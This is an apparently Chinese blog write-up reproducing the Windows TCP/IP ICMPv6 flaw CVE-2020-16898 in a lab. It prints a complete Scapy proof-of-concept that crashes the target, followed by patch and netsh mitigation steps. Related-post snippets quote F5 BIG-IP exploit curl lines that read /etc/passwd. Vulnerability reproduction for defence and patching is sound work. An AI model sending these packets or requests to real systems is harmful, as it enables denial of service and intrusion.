本地ip 远程ip_CVE202016898TCP/IP远程代码执行漏洞复现

最新推荐文章于 2023-07-11 09:41:17 发布
最新推荐文章于 2023-07-11 09:41:17 发布
阅读量139 收藏
点赞数
文章标签: 本地ip 远程ip

一、漏洞介绍

         该漏洞主要是由于Windows TCP/IP堆栈在处理IMCPv6 Router Advertisement(路由通告)数据包时存在漏洞,远程攻击者通过构造特制的ICMPv6 Router Advertisement(路由通告)数据包时,处理逻辑存在漏洞,导致可以攻击者可以进行远程代码执行。成功利用该漏洞的攻击者可以在目标主机或服务器上执行任意代码。但是该漏洞必须要目标主机启用IPv6协议才可以,否则无法进行利用。

二、影响版本

Microsoft Windows 10 1709

Microsoft Windows 10 1803

Microsoft Windows 10 1809

Microsoft Windows 10 1903

Microsoft Windows 10 1909

Microsoft Windows 10 2004

Microsoft Windows Server 2019

Microsoft Windows Server, version 1903

Microsoft Windows Server, version 1909

Microsoft Windows Server, version 2004

三、漏洞复现

0x01 环境搭建

(1):虚拟机开启IPv6

cc7f6e09c9c6de5c124fc6389a3c878e.png

(2):关闭目标主机防火墙

很重要的一步,两台主机一定要互通,因此需要关闭目标主机防火墙。否则无法ping通。

c002de1d80dcd6c8459196a57087e77a.png

cfd71111eb10f0e0ca3bae20b8666206.png

(3):攻击者主机IP(kali2018):

IPv4:192.168.223.160

IPv6:fd15:4ba5:5a2b:1008:20c:29ff:fe62:aae

fb0d3c2a0aba4cb133feb7dd5ad4d0d5.png

目标主机IP(虚拟机):

IPv4:192.168.223.179

IPv6:fd15:4ba5:5a2b:1008:2060:1ba4:e672:9966

07692bdce512dcc684b24ee07e6ea39c.png

(4):查看目标主机系统版本

be91043f664665ced77bcd52d84f0028.png

主机版本号是1909,在受害主机影响范围之内。

0x02 漏洞复现

(1):payload如下

from scapy.all import * from scapy.layers.inet6 import ICMPv6NDOptEFA, ICMPv6NDOptRDNSS, ICMPv6ND_RA, IPv6, IPv6ExtHdrFragment, fragment6   v6_dst = "fd15:4ba5:5a2b:1008:2060:1ba4:e672:9966" v6_src = "fe80::3d6b:a8c1:521b:b1c7%23"   p_test_half = 'A'.encode()*8 + b"\x18\x30" + b"\xFF\x18" p_test = p_test_half + 'A'.encode()*4   c = ICMPv6NDOptEFA()   e = ICMPv6NDOptRDNSS() e.len = 21 e.dns = [ "AAAA:AAAA:AAAA:AAAA:FFFF:AAAA:AAAA:AAAA", "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA", "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA", "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA", "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA", "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA", "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA", "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA", "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA", "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA" ] aaa = ICMPv6NDOptRDNSS() aaa.len = 8 pkt = ICMPv6ND_RA() / aaa / \       Raw(load='A'.encode()*16*2 + p_test_half + b"\x18\xa0"*6) / c / e / c / e / c / e / c / e / c / e / e / e / e / e / e / e   p_test_frag = IPv6(dst=v6_dst, src=v6_src, hlim=255)/ \               IPv6ExtHdrFragment()/pkt   l=fragment6(p_test_frag, 200)   for p in l:     send(p)

(2):修改目标主机和本机IPv6

6de8cf2bd48e5ea20572cd4c4f1d903e.png

(3):执行payload

python3 CVE-2020-16898-poc.py

   注意:需要使用python3.7版本,如果是使用python3.9版本可能会报错。(本人是这样的)

a54eac4b5629500fa5a0579a3fff5aea.png

(4):目标主机蓝屏

33ea2bcefdbdfd10edc6bf957a6f2621.png

四、修复建议

0x01 打官方补丁

补丁地址如下:

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16898

0x02 临时方案

(1):检查所有网络IPv6接口的列表以及相应的索引号

netsh int ipv6 sh int

4531bce559365224a8ebbba3603fda40.png

(2):确认网络接口的RDNSS功能开启情况

netsh int ipv6 sh int 6

55ed0071f05e64cd5e64278e6e049c97.png

(3):关闭RDNSS功能

netsh int ipv6 set int 6 rabaseddnsconfig=disable

406dc8a61f92ffab7172cb42204e54dd.png

(4):再次确认接口的RDNSS功能开启情况

netsh int ipv6 sh int 6

5f54e0e0690f07c3f8177347aaf08f24.png

c55f84ac626515f0635e377ae227a542.png

weixin_39559895
关注
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞s2-052(CVE-2017-9805)
qq_51577576的博客
12-15 1549
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞s2-052(CVE-2017-9805) Apache Struts2的REST插件存在远程代码执行的高危漏洞,其编号为CVE-2017-9805(S2-052)。Struts2 REST插件的XStream组件存在反序列化漏洞,使用XStream组件对XML格式的数据包进行反序列化操作时,未对数据内容进行有效验证,存在安全隐患,可被远程攻击。
Windows tcp ip远程代码执行漏洞CVE-2020-16898)复现
weixin_47531489的博客
07-20 898
1 简介 CVE-2020-16898,又称“Bad Neighbor”。Windows TCP/IP堆栈不正确地处理ICMPv6 Router Advertisement数据包时,存在一个远程执行代码漏洞。成功利用此漏洞的攻击者可以获得在目标服务器或客户端上执行代码的能力。要利用此漏洞,攻击者必须将经过特殊设计的ICMPv6 Router Advertisement数据包发送到远程Windows计算机上。 2 漏洞概述 当 Windows TCP/IP 堆栈不正确地处理使用 Option Type
CVE-2020-16898漏洞复现
最新发布
HengMengSec的博客
07-11 846
CVE-2020-16898,又称“Bad Neighbor”,在Windows TCP/IP堆栈不正确地处理ICMPv6 Router Advertisement数据包时,存在一个远程执行代码漏洞。成功利用此漏洞的攻击者可以获得在目标服务器或客户端上执行代码的能力。要利用此漏洞,攻击者必须将经过特殊设计的ICMPv6 Router Advertisement数据包发送到远程Windows计算机上。
漏洞复现 - CVE-2020-16898 微软TCP/IP远程执行代码漏洞
10-17 2041
前几天微软更新补丁中有个CVE-2020-16898,下面是摘抄的一段描述, Windows TCP/IP堆栈不正确地处理ICMPv6 Router Advertisement数据包时,存在一个远程执行代码漏洞。成功利用此漏洞的攻击者可以获得在目标服务器或客户端上执行代码的能力。要利用此漏洞,攻击者必须将经过特殊设计的ICMPv6 Router Advertisement数据包发送到远程Windows计算机上。 漏洞原理不是很懂,主要是记录下复现过程 一、环境 ①网络环境开启ipv6支持。这里使用v
追洞小组 | 实战CVE-2020-16898漏洞复现
Ms08067安全实验室
02-25 1341
三连一下,一起学安全文章来源|MS08067 WEB攻防知识星球本文作者:M-101(Ms08067实验室追洞小组成员) 漏洞复现分析 认准追洞小组漏洞名称Window...
CVE-2021-24086 Windows系统TCP/IP拒绝服务漏洞复现
m0_56642842的博客
05-31 2036
简介 Windows IPv6协议栈存在一处拒绝服务漏洞,此漏洞的根本原因是IPv6的嵌套分片机制中,当尝试递归重组嵌套的分片时会计算内部有效载荷中包含的所有扩展标头,当重组扩展头约为0xffff字节的数据包时,在IPv6 ReassembleDatagram中发生的NULL指针取消引用,发生崩溃。 远程攻击者可通过向目标系统发送特制数据包来利用此漏洞,成功利用此漏洞可导致目标系统拒绝服务(蓝屏)。 漏洞影响系统版本 Windows 10 Version 20H2 for x64-based Systems
TCP/IP远程代码执行漏洞CVE-2020-16898)复现
玄道的网安博客
11-06 1474
简介 Windows TCP/IP堆栈不正确地处理ICMPv6 Router Advertisement数据包时,存在一个远程执行代码漏洞。成功利用此漏洞的攻击者可以获得在目标服务器或客户端上执行代码的能力。要利用此漏洞,攻击者必须将经过特殊设计的ICMPv6 Router Advertisement数据包发送到远程Windows计算机上。 漏洞概述 Windows TCP/IP堆栈在处理IMCPv6 Router Advertisement(路由通告)数据包时存在漏洞远程攻击者通过构造..
CVE-2020-16838 Windows tcp/ip 远程代码执行漏洞复现
Lelouch_E的博客
11-17 303
漏洞环境 攻击机:windows 10 (python版本:3.7 ,安装了scapy依赖) 受害机环境:windows10 1909 受害机网络开启ipv6支持 打开cmd输入ipconfig查看受害机ipv6地址为 fd15:4ba5:5a2b:1008:8c9a:8a2b:4489:74aa 攻击机的ipv6地址为 fe80::9835:b7ba:c813:5f6a%10 要求攻击机与受害机网络畅通 漏洞分析   根据rfc5006描述,RDNSS包的length应为奇
CVE-2020-16898TCP/IP远程代码执行漏洞
m0_48520508的博客
11-05 2357
0x00简介 CVE-2020-16898,又称“Bad Neighbor”Windows TCP/IP堆栈不正确地处理ICMPv6 Router Advertisement数据包时,存在一个远程执行代码漏洞。成功利用此漏洞的攻击者可以获得在目标服务器或客户端上执行代码的能力。要利用此漏洞,攻击者必须将经过特殊设计的ICMPv6 Router Advertisement数据包发送到远程Windows计算机上。 0x01漏洞描述 远程攻击者通过构造特制的ICMPv6 Router Advertisement(
获取远程IP代码,在反向代理可能存在的情况下)
Alan_seeker的博客
06-03 461
代码: public static function getIp() { if( !empty( $_SERVER['HTTP_X_FORWARDED_FOR'] ) ){ return $_SERVER['HTTP_X_FORWARDED_FOR'];//反向代理情况下 } return $_SERVER['RE...
CVE-2020-5902 F5 BIG-IP 远程代码执行RCE
weixin_41082546的博客
07-06 239
cve-2020-5902 : RCE: curl -v -k 'https://[F5 Host]/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin' Read File: curl -v -k 'https://[F5 Host]/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd
网络靶场实战--BIG-IP CVE漏洞分析(CVE-2022-41622)(CVE-2022-41800)
蛇矛实验室
12-13 1363
这一小节,我们简单分析了F5设备的俩个pre-auth漏洞,了解了rpm注入和csrf漏洞产生原因。并且在此过程中我们简单学习F5设备中 soap接口和rest接口的区别以及利用。蛇矛实验室成立于2020年,致力于安全研究、攻防解决方案、靶场对标场景仿真复现及技战法设计与输出等相关方向。团队核心成员均由从事安全行业10余年经验的安全专家组成,团队目前成员涉及红蓝对抗、渗透测试、逆向破解、病毒分析、工控安全以及免杀等相关领域。
Apache ActiveMQ 远程代码执行漏洞 (CVE-2016-3088) 复现
weixin_30709635的博客
09-04 614
漏洞复现 直接写 shell 写 shell 的话,需要写在 admin 或者 api 中,也就是需要登录,没有密码的话完成不了写 shell 操作。 该环境默认的口令为 admin/admin。 访问 http://ip:8161/admin/test/systemProperties.jsp 获得当前系统的路径 上传 jsp 小马,返回204,但是在...
scapy构造IP分片包
dangdanding的专栏
06-12 1811
scapy构造IP分片包
让命令执行漏洞无所遁形:详解其利用方式和危害因素
weixin_43263566的博客
02-01 1357
命令执行利用
cve-2021-24086(拒绝服务攻击)复现
小白一枚多多关注的博客
06-25 1752
今年出来的一些漏洞中有一个很有意思的洞,那就是利用ipv6的机制去执行拒绝服务攻击,效果是使受害主机蓝屏等效果,这个漏洞对应的poc就是cve-2021-24086.py,下载链接点击这里。 注意:最好使用kali来进行使用,windows系统需要配置很多东西,不是太简便 实验环境: cve-2021-24086 poc backbox(这里也可以用kali,看个人习惯) windows 7 实验步骤: 1.下载好POC后,我们先用python3 cve-2021-24086运行一下,如果出现
CVE-2020-16898 Windows tcp/ip远程代码执行漏洞
qq_22807425的博客
11-03 955
CVE-2020-16898 Windows tcp/ip远程代码执行漏洞 0x00 前言 2020年10月13日,Microsoft 发布了 TCP/IP远程代码执行漏洞的风险通告,该漏洞编号为CVE-2020-16898。 0x01 漏洞简述 远程攻击者通过构造特制的ICMPv6 Router Advertisement(路由通告)数据包,并将其发送到远程Windows主机上,即可在目标主机上执行任意代码。要利用此漏洞,攻击者必须将特制的ICMPv6路由器广告数据包发送到远程Windows计算机。 触发
面对Ping漏洞的安全须知以及防范措施
myerror的专栏
11-13 1254
Ping入侵即是ICMP(Internet Control and Message Protocal是因特网控制消息错误报文协议)入侵,原理是通过Ping大量的数据包使得计算机的CPU使用率居高不下而崩溃,通常在一个时段内连续向计算机发出大量请求而导致CPU处理不及而死机. 一、安全须知 Windows的操作系统谁都知道比较危险,原因就是漏洞实在很多。单靠打补丁就已经足够烦恼,要是万一被黑客盯上或
CVE-2020-16898: Windows操作系统 TCP-IP远程执行代码漏洞
weixin_38896449的博客
12-03 718
这里写目录标题1.漏洞描述2.影响版本3.漏洞排查4.漏洞利用5.漏洞修复 1.漏洞描述 10月,微软官方发布安全公告,修复了Windows操作系统内的TCP/IP远程代码执行漏洞CVE-2020-16898)。攻击者可通过发送特制的ICMPv6 Router Advertisement(路由通告)数据包至远程Windows主机,即可在目标主机上执行任意代码漏洞风险:严重 2.影响版本 Windows 10 version 1709/1803/1809/1903/1909/2004 Windows S
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值